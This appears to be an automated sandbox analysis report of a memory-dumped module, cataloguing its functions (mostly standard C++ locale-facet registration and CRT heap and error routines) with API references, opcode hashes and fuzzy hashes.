Opcode ID: c432740e7ce3ecffa8e7ce5014ea25b1d965276609fedf095828eba3bdba230c
Instruction ID: f48b6790a781b0bfba114ec4271584c4cf2c65701337db8361fc1e01497c0246
Opcode Fuzzy Hash: c432740e7ce3ecffa8e7ce5014ea25b1d965276609fedf095828eba3bdba230c
Instruction Fuzzy Hash: 5211AC72C042298BCF05DBA5C990EEE7775AF84364F26040DD611AB390EF34EE018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D48CD84, Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D48CD95
moneypunct.LIBCPMT ref: 6D48CDCF
std::_Facet_Register.LIBCPMT ref: 6D48CDE6
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48CE06
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48CE24

Memory Dump Source

Source File: 00000002.00000002.908044546.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrowmoneypunct
String ID:
API String ID: 158860062-0
Opcode ID: 169dedf51f5d0f82ac054f09c8c6978058cf34377111132661ad34b0c4d6ee92
Instruction ID: 6a4a3e08ded4054197777a8f02cf788b8b00b9d1e14d8a505385b4a4c52c1c2b
Opcode Fuzzy Hash: 169dedf51f5d0f82ac054f09c8c6978058cf34377111132661ad34b0c4d6ee92
Instruction Fuzzy Hash: 2C119A328042299BCF14DBA5C840EFE7B75AF85364F26050DD610AB391DF74EE418BD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D480420, Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D480431
collate.LIBCPMT ref: 6D48046B
std::_Facet_Register.LIBCPMT ref: 6D480482
std::_Lockit::~_Lockit.LIBCPMT ref: 6D4804A2
__CxxThrowException@8.LIBVCRUNTIME ref: 6D4804C0

Memory Dump Source

Source File: 00000002.00000002.908044546.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrowcollate
String ID:
API String ID: 86117490-0
Opcode ID: f346fb75506384176464aeb08b68611dbc3830018fd22625057d3dde33f21c6e
Instruction ID: bf2ccf3a0551a2146f17593b45fa2422438b2e61c61384e3bafa3a5d254fb74a
Opcode Fuzzy Hash: f346fb75506384176464aeb08b68611dbc3830018fd22625057d3dde33f21c6e
Instruction Fuzzy Hash: 3D11EC329042299BCF15DFA1C880EEE7775AF80764F26040DD611BB2A0DF30DE418BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D4804C6, Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D4804D7
collate.LIBCPMT ref: 6D480511
std::_Facet_Register.LIBCPMT ref: 6D480528
std::_Lockit::~_Lockit.LIBCPMT ref: 6D480548
__CxxThrowException@8.LIBVCRUNTIME ref: 6D480566

Memory Dump Source

Source File: 00000002.00000002.908044546.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrowcollate
String ID:
API String ID: 86117490-0
Opcode ID: 39fe53d9a84223e915662a0862e69953a3564060f2a54ccd8ffd2a021565f28b
Instruction ID: 35853d34022c736bc9adaa1874975f74d622de95834dace82747b579904015f4
Opcode Fuzzy Hash: 39fe53d9a84223e915662a0862e69953a3564060f2a54ccd8ffd2a021565f28b
Instruction Fuzzy Hash: 3D11AC728046299BCF05DFA5C884EEE7775AF84368F26040DD614AB290DF34EE058BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D480612, Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D480623
messages.LIBCPMT ref: 6D48065D
std::_Facet_Register.LIBCPMT ref: 6D480674
std::_Lockit::~_Lockit.LIBCPMT ref: 6D480694
__CxxThrowException@8.LIBVCRUNTIME ref: 6D4806B2

Memory Dump Source

Source File: 00000002.00000002.908044546.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrowmessages
String ID:
API String ID: 447356255-0
Opcode ID: 3d333e042352d5b1308f0ef8bf65b45a651cd0ee9679d2fa82f1a104f3f4c2a1
Instruction ID: bf55b2ccaeb9bde9b5476912c0cd11da5956d0c329e2bdaf73b2ad1eeb8fe921
Opcode Fuzzy Hash: 3d333e042352d5b1308f0ef8bf65b45a651cd0ee9679d2fa82f1a104f3f4c2a1
Instruction Fuzzy Hash: 7A11A0328042199BCF05DB65C844EEE7775AF84354F2A040DD616BB390DF74DE018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D48CE2A, Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D48CE3B
moneypunct.LIBCPMT ref: 6D48CE75
std::_Facet_Register.LIBCPMT ref: 6D48CE8C
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48CEAC
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48CECA

Memory Dump Source

Source File: 00000002.00000002.908044546.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrowmoneypunct
String ID:
API String ID: 158860062-0
Opcode ID: 91452b926b02fe09204edfdb5baaebb95c3a019fc8e1e817282bd6f99ccbc297
Instruction ID: 673cb1e2456a296a382d523126225180c3ec358f0679807872fd1924a273018d
Opcode Fuzzy Hash: 91452b926b02fe09204edfdb5baaebb95c3a019fc8e1e817282bd6f99ccbc297
Instruction Fuzzy Hash: C3119A729042298BCF14DBA5C840EFE77B5AF84754F26010ED610AB391DF74EE419BD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D480E80, Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D480E91
numpunct.LIBCPMT ref: 6D480ECB
std::_Facet_Register.LIBCPMT ref: 6D480EE2
std::_Lockit::~_Lockit.LIBCPMT ref: 6D480F02
__CxxThrowException@8.LIBVCRUNTIME ref: 6D480F20

Memory Dump Source

Source File: 00000002.00000002.908044546.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrownumpunct
String ID:
API String ID: 2501072427-0
Opcode ID: 3a234ae8d2625f3f6814d5e645d248dcb61e3a9983c5675b96d625a783e90026
Instruction ID: 9df684e113dfa27f0677b02a0ec607c5ea61fd674d176d0d83a8b29f93d3b353
Opcode Fuzzy Hash: 3a234ae8d2625f3f6814d5e645d248dcb61e3a9983c5675b96d625a783e90026
Instruction Fuzzy Hash: 0611A0329042199BCF15DF65C844EFE7775AF85354F26041DD6116B290DF74DE018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D4806B8, Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D4806C9
messages.LIBCPMT ref: 6D480703
std::_Facet_Register.LIBCPMT ref: 6D48071A
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48073A
__CxxThrowException@8.LIBVCRUNTIME ref: 6D480758

Memory Dump Source

Source File: 00000002.00000002.908044546.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrowmessages
String ID:
API String ID: 447356255-0
Opcode ID: 78ac1076fa26bf45fafe6df12a1640ed719bd07d585b3a9411fbb709b65a5d4b
Instruction ID: 36659fa113f989637416a9e81e08acb4ad8f06632a8f18e2a956507b894c6d8f
Opcode Fuzzy Hash: 78ac1076fa26bf45fafe6df12a1640ed719bd07d585b3a9411fbb709b65a5d4b
Instruction Fuzzy Hash: CB119A329042698BCF15DBA5C884EEE7775AF84768F26041ED611AB290DF34DE01CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D4809F6, Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D480A07
moneypunct.LIBCPMT ref: 6D480A41
std::_Facet_Register.LIBCPMT ref: 6D480A58
std::_Lockit::~_Lockit.LIBCPMT ref: 6D480A78
__CxxThrowException@8.LIBVCRUNTIME ref: 6D480A96

Memory Dump Source

Source File: 00000002.00000002.908044546.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrowmoneypunct
String ID:
API String ID: 158860062-0
Opcode ID: 3b7713bc617e64bcf42d1043b4f4f8b5a55bf65e6e5abccc8bf604e617f56a8f
Instruction ID: b21035272712467243b7f4e3958dcc3923e8df0d1bd56202bde803e3550932e6
Opcode Fuzzy Hash: 3b7713bc617e64bcf42d1043b4f4f8b5a55bf65e6e5abccc8bf604e617f56a8f
Instruction Fuzzy Hash: C011AC328041299BCF15DFA6C840EEE77B5AF84358F26440DD610AB291DF74EE028BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D480B42, Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D480B53
moneypunct.LIBCPMT ref: 6D480B8D
std::_Facet_Register.LIBCPMT ref: 6D480BA4
std::_Lockit::~_Lockit.LIBCPMT ref: 6D480BC4
__CxxThrowException@8.LIBVCRUNTIME ref: 6D480BE2

Memory Dump Source

Source File: 00000002.00000002.908044546.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrowmoneypunct
String ID:
API String ID: 158860062-0
Opcode ID: b22674adcddd4f7ca0ee1961414124575ca3a12ea92b250425039b3bdff5b0c2
Instruction ID: dcc723c190bfc79ed722ede56f5d2dfb2289a093371cb7d3842c33cdab91b612
Opcode Fuzzy Hash: b22674adcddd4f7ca0ee1961414124575ca3a12ea92b250425039b3bdff5b0c2
Instruction Fuzzy Hash: F2119A728041698BCF15DBA5C884EEE7775AF85368F26080DE611BB2A0DF74DE018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D48037A, Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D48038B
codecvt.LIBCPMT ref: 6D4803C5
std::_Facet_Register.LIBCPMT ref: 6D4803DC
std::_Lockit::~_Lockit.LIBCPMT ref: 6D4803FC
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48041A

Memory Dump Source

Source File: 00000002.00000002.908044546.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrowcodecvt
String ID:
API String ID: 324574759-0
Opcode ID: 647b72f24ef8154aad12e132a8b52c56a68bd27abf08c229c282e7846524e63f
Instruction ID: 2f258415c9a8f746fcb9e5d6df13fc1a86bb0639220ee111e2f22b56d37eb188
Opcode Fuzzy Hash: 647b72f24ef8154aad12e132a8b52c56a68bd27abf08c229c282e7846524e63f
Instruction Fuzzy Hash: D511AC7290422A8BCF14DBA6C890EEE7775AF85764F26040DD610AB391DF74DE418BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D480BE8, Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D480BF9
moneypunct.LIBCPMT ref: 6D480C33
std::_Facet_Register.LIBCPMT ref: 6D480C4A
std::_Lockit::~_Lockit.LIBCPMT ref: 6D480C6A
__CxxThrowException@8.LIBVCRUNTIME ref: 6D480C88

Memory Dump Source

Source File: 00000002.00000002.908044546.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrowmoneypunct
String ID:
API String ID: 158860062-0
Opcode ID: 17c619255c18b71b77515c0aa2dcf6448f7f865416d62d7222f870f8e7899223
Instruction ID: 1f4bdf154e9b70b017e5b69de2733d84f86e373b8fcc8f200a90fed21d123b15
Opcode Fuzzy Hash: 17c619255c18b71b77515c0aa2dcf6448f7f865416d62d7222f870f8e7899223
Instruction Fuzzy Hash: AC119A72904229CBCF19DFA5C884EEE7775AF85364F26080DE610AB2A0DF34DE018BD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D48CB92, Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D48CBA3
messages.LIBCPMT ref: 6D48CBDD
std::_Facet_Register.LIBCPMT ref: 6D48CBF4
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48CC14
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48CC32

Memory Dump Source

Source File: 00000002.00000002.908044546.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrowmessages
String ID:
API String ID: 447356255-0
Opcode ID: ebbdecfe602bc82e657915630c458349b6f06886b2c6c89da16d6b01a31d9bb4
Instruction ID: e4f4da627cea5d70f590c2cdc33763716322624db6d232ccd484656c287c18e9
Opcode Fuzzy Hash: ebbdecfe602bc82e657915630c458349b6f06886b2c6c89da16d6b01a31d9bb4
Instruction Fuzzy Hash: 6D11AC328042298BCF04DFA5C880EEE7775AF85364F26050EE611AB391DF74DE419BD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D480A9C, Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D480AAD
moneypunct.LIBCPMT ref: 6D480AE7
std::_Facet_Register.LIBCPMT ref: 6D480AFE
std::_Lockit::~_Lockit.LIBCPMT ref: 6D480B1E
__CxxThrowException@8.LIBVCRUNTIME ref: 6D480B3C

Memory Dump Source

Source File: 00000002.00000002.908044546.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrowmoneypunct
String ID:
API String ID: 158860062-0
Opcode ID: 323ecd5e2bed572ea63a9ae1573f48b712ba0917a30be212679592e31de3f1c9
Instruction ID: 159880a051bd0091e8134d7548f6d7eafc48328174261f07046a2a3989c3389d
Opcode Fuzzy Hash: 323ecd5e2bed572ea63a9ae1573f48b712ba0917a30be212679592e31de3f1c9
Instruction Fuzzy Hash: F511AC329042298BCF05DFA6C880EEE7775AF85368F26040DD611AB291DF74DE41CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D4BDEDB, Relevance: 7.6, APIs: 5, Instructions: 53COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,6D4B41FE,6D4BF5DE,?,6D4BDE85,00000001,00000364,?,?,6D4B42CA,?,?,6D47A5FA), ref: 6D4BDEE0
_free.LIBCMT ref: 6D4BDF15
_free.LIBCMT ref: 6D4BDF3C
SetLastError.KERNEL32(00000000), ref: 6D4BDF49
SetLastError.KERNEL32(00000000), ref: 6D4BDF52

Memory Dump Source

Source File: 00000002.00000002.908044546.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 03ae2aa445951a53069d7f1da10e3360fbc47b87346566c50a8a7d33d8e8e492
Instruction ID: c231fee8f303f25c348a00c1e1bc0176ea73fec657a03491ce655016503f57b7
Opcode Fuzzy Hash: 03ae2aa445951a53069d7f1da10e3360fbc47b87346566c50a8a7d33d8e8e492
Instruction Fuzzy Hash: 6001493E10C60126DE0286394C84F1A2E79ABE63BAB33416DF60E93381FF31CC0181B5

Uniqueness

Uniqueness Score: -1.00%

Function 6D4CC438, Relevance: 7.5, APIs: 5, Instructions: 40COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6D4CC450

Part of subcall function 6D4C02CE: HeapFree.KERNEL32(00000000,00000000,?,6D4CC724,?,00000000,?,00000000,?,6D4CCA29,?,00000007,?,?,6D4CBDC8,?), ref: 6D4C02E4
Part of subcall function 6D4C02CE: GetLastError.KERNEL32(?,?,6D4CC724,?,00000000,?,00000000,?,6D4CCA29,?,00000007,?,?,6D4CBDC8,?,?), ref: 6D4C02F6

_free.LIBCMT ref: 6D4CC462
_free.LIBCMT ref: 6D4CC474
_free.LIBCMT ref: 6D4CC486
_free.LIBCMT ref: 6D4CC498

Memory Dump Source

Source File: 00000002.00000002.908044546.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: f10d7b58bbe39dd218081843b1078a4602fc37290dd59879506204f52597c893
Instruction ID: 4d67c89da36e85a05af5071ede19e8db2b127fb059a4bd19b2c2f806b34427ef
Opcode Fuzzy Hash: f10d7b58bbe39dd218081843b1078a4602fc37290dd59879506204f52597c893
Instruction Fuzzy Hash: 76F04F7D50920597DF20DE65E581E2633E9AB056227738809F518EBB00D731FCC08AAA

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C2A87, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186COMMON

Download Yara Rule

Strings

L<Km, xrefs: 6D4C2B86

Memory Dump Source

Source File: 00000002.00000002.908044546.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID:
String ID: L<Km
API String ID: 0-4252610374
Opcode ID: 59e0ecba0fd12e18b684743089c37dd0f249ff1982f4c4212aa115e2565e32dd
Instruction ID: 527e53a791ee1cc964f81fa84e191f59de085f45ab9be425f9c54236223fa4f7
Opcode Fuzzy Hash: 59e0ecba0fd12e18b684743089c37dd0f249ff1982f4c4212aa115e2565e32dd
Instruction Fuzzy Hash: 8651B879D5820A9FDF21CFA9C884FAE7BB4BF16314F115149E514A7250DFB09D01CB62

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C3F56, Relevance: 6.1, APIs: 4, Instructions: 110COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,4D8A1055,?,00000000,00000000,?,?,?,?,00000001,?,4D8A1055,00000001,?,?), ref: 6D4C3FA3
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 6D4C402C
GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,6D4B60DF), ref: 6D4C403E
__freea.LIBCMT ref: 6D4C4047

Part of subcall function 6D4C1817: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 6D4C1849

Memory Dump Source

Source File: 00000002.00000002.908044546.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 757e17827b2c4fe956b09aba4731e399595842ec85f8af8b708d8ff172e33a3f
Instruction ID: 05e0e09f78537c155c125e2a50027fdf50212e625966caf5ab1ab347b1616247
Opcode Fuzzy Hash: 757e17827b2c4fe956b09aba4731e399595842ec85f8af8b708d8ff172e33a3f
Instruction Fuzzy Hash: B7319D36A0020AABDF25CF66DC84EAE3BA5EB45254F114229EC18DB250E739DD51CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6D480D34, Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D480D45
std::_Facet_Register.LIBCPMT ref: 6D480D96
std::_Lockit::~_Lockit.LIBCPMT ref: 6D480DB6
__CxxThrowException@8.LIBVCRUNTIME ref: 6D480DD4

Memory Dump Source

Source File: 00000002.00000002.908044546.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrow
String ID:
API String ID: 1640353255-0
Opcode ID: 5a6e74543efa17602a7f554399ad1ad1a457ed473aee90981bd9ecb4f178b17f
Instruction ID: 11ed2e06494746cad1f0524cea18405a93ba614d5b12e7c57329dac7e4d6a8ec
Opcode Fuzzy Hash: 5a6e74543efa17602a7f554399ad1ad1a457ed473aee90981bd9ecb4f178b17f
Instruction Fuzzy Hash: C211EC328042298BCF04CFA5C854EEE77B5AF81358F26040DE601AB390DF30EE018BD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D480DDA, Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D480DEB
std::_Facet_Register.LIBCPMT ref: 6D480E3C
std::_Lockit::~_Lockit.LIBCPMT ref: 6D480E5C
__CxxThrowException@8.LIBVCRUNTIME ref: 6D480E7A

Memory Dump Source

Source File: 00000002.00000002.908044546.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrow
String ID:
API String ID: 1640353255-0
Opcode ID: c95429d6a5a043a578d33f128ab09f858e30e1dc304a234b478f6e6c95622fec
Instruction ID: 78d17f2754967a5607c9d52cba2232b9a4f0e6a02ab3608d9c84952614b99449
Opcode Fuzzy Hash: c95429d6a5a043a578d33f128ab09f858e30e1dc304a234b478f6e6c95622fec
Instruction Fuzzy Hash: E8119A7290422A9BCF15DBA5C884EFE7775AF85794F26040DE611AB390DF34DE018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D48CC38, Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D48CC49
std::_Facet_Register.LIBCPMT ref: 6D48CC9A
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48CCBA
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48CCD8

Memory Dump Source

Source File: 00000002.00000002.908044546.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrow
String ID:
API String ID: 1640353255-0
Opcode ID: e9febdd977b16423b79748ebbf40217c0bcf0eb774d7ee06ffe101eef45e14b3
Instruction ID: c3ad9c35b194fccf1a0c64262b013db24cb39f7004ce579877582aee004c65bd
Opcode Fuzzy Hash: e9febdd977b16423b79748ebbf40217c0bcf0eb774d7ee06ffe101eef45e14b3
Instruction Fuzzy Hash: 0A11A0329041298BCF04DBA5C840EFE7775AF85354F26050ED610AB391DF74DE018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D48CCDE, Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D48CCEF
std::_Facet_Register.LIBCPMT ref: 6D48CD40
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48CD60
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48CD7E

Memory Dump Source

Source File: 00000002.00000002.908044546.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrow
String ID:
API String ID: 1640353255-0
Opcode ID: 8f239664b61ac9e91c3d5b778748338dee5f00bfd58879cf8e639b660fe5b289
Instruction ID: 44f282b8ddae375fc04f14845d1e7b67e1298913ab9a58ad5f1460d4373d4e79
Opcode Fuzzy Hash: 8f239664b61ac9e91c3d5b778748338dee5f00bfd58879cf8e639b660fe5b289
Instruction Fuzzy Hash: 2911A0328041598BCF14DBA5C840EEE7BB5BF85754F26051DD6116B2A1DF74DE018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D480C8E, Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D480C9F
std::_Facet_Register.LIBCPMT ref: 6D480CF0
std::_Lockit::~_Lockit.LIBCPMT ref: 6D480D10
__CxxThrowException@8.LIBVCRUNTIME ref: 6D480D2E

Memory Dump Source

Source File: 00000002.00000002.908044546.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrow
String ID:
API String ID: 1640353255-0
Opcode ID: 3a0489795db3487f8d127704e452e0b3fb2ff1ae28d768859db2fde6f981dc88
Instruction ID: 3fcc104816214e690e977a3a015f63bbb5b5160fb19c4fa7cf3cf6e133f50979
Opcode Fuzzy Hash: 3a0489795db3487f8d127704e452e0b3fb2ff1ae28d768859db2fde6f981dc88
Instruction Fuzzy Hash: 8A11AC328041698BCF05DFA6C884EEE77B5AF84354F26440EE615AB290DF34EE01CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D48075E, Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D48076F
std::_Facet_Register.LIBCPMT ref: 6D4807C0
std::_Lockit::~_Lockit.LIBCPMT ref: 6D4807E0
__CxxThrowException@8.LIBVCRUNTIME ref: 6D4807FE

Memory Dump Source

Source File: 00000002.00000002.908044546.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrow
String ID:
API String ID: 1640353255-0
Opcode ID: c3bd025fa392089247d8c774d7b86dde66107961114d62c683d7931ee1521b76
Instruction ID: 177bcea6f51a6758e95a3f8c7eabc97e9f89100572e05defd5642680c2618e72
Opcode Fuzzy Hash: c3bd025fa392089247d8c774d7b86dde66107961114d62c683d7931ee1521b76
Instruction Fuzzy Hash: 7D119A36C042298BCF05DBA6C880EEE7775AF85764F26041DD611AB2A1DF74DE018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D480F26, Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D480F37
std::_Facet_Register.LIBCPMT ref: 6D480F88
std::_Lockit::~_Lockit.LIBCPMT ref: 6D480FA8
__CxxThrowException@8.LIBVCRUNTIME ref: 6D480FC6

Memory Dump Source

Source File: 00000002.00000002.908044546.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrow
String ID:
API String ID: 1640353255-0
Opcode ID: 2a667bc4cca61343518e2f66ed4a5a5a13052eb77c3b6e884d9f2055d220e05e
Instruction ID: 5f9de9f948c43be1c1318fee31d502832e5cb35c9637a851bcae922b45bd7756
Opcode Fuzzy Hash: 2a667bc4cca61343518e2f66ed4a5a5a13052eb77c3b6e884d9f2055d220e05e
Instruction Fuzzy Hash: 72119E329042199BCF05DF66C840EEE7776BF84754F26440DE614AB291DFB4DE018BD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D480FCC, Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D480FDD
std::_Facet_Register.LIBCPMT ref: 6D48102E
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48104E
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48106C

Memory Dump Source

Source File: 00000002.00000002.908044546.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrow
String ID:
API String ID: 1640353255-0
Opcode ID: c56bc8c21908ff25d29b172b7e09e45db72f52923a99d5a2fa02198edc2a2d23
Instruction ID: 89bf6edb30f7e89e9c9809681f86f3c138b17145cd3dd8c42011dc5e0c1290b0
Opcode Fuzzy Hash: c56bc8c21908ff25d29b172b7e09e45db72f52923a99d5a2fa02198edc2a2d23
Instruction Fuzzy Hash: 25118C329042598BCF15DBA4C884EEE7775BF85394F26040ED621AB291DF349E018BD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D48CED0, Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D48CEE1
std::_Facet_Register.LIBCPMT ref: 6D48CF32
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48CF52
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48CF70

Memory Dump Source

Source File: 00000002.00000002.908044546.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrow
String ID:
API String ID: 1640353255-0
Opcode ID: 06d97fd7791d7a2d5a17ea833c487a0e9f4c780b8be95ddcd556a04e7f0c0c4a
Instruction ID: a833da3f418ed1dc61409a7b590e3b8ceabe871af1ddbfb45da1472c377a8001
Opcode Fuzzy Hash: 06d97fd7791d7a2d5a17ea833c487a0e9f4c780b8be95ddcd556a04e7f0c0c4a
Instruction Fuzzy Hash: E011AC328041299BCF05DFA5C840EEE7B75AF84764F26450EE614AB391DF74EE018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D480950, Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

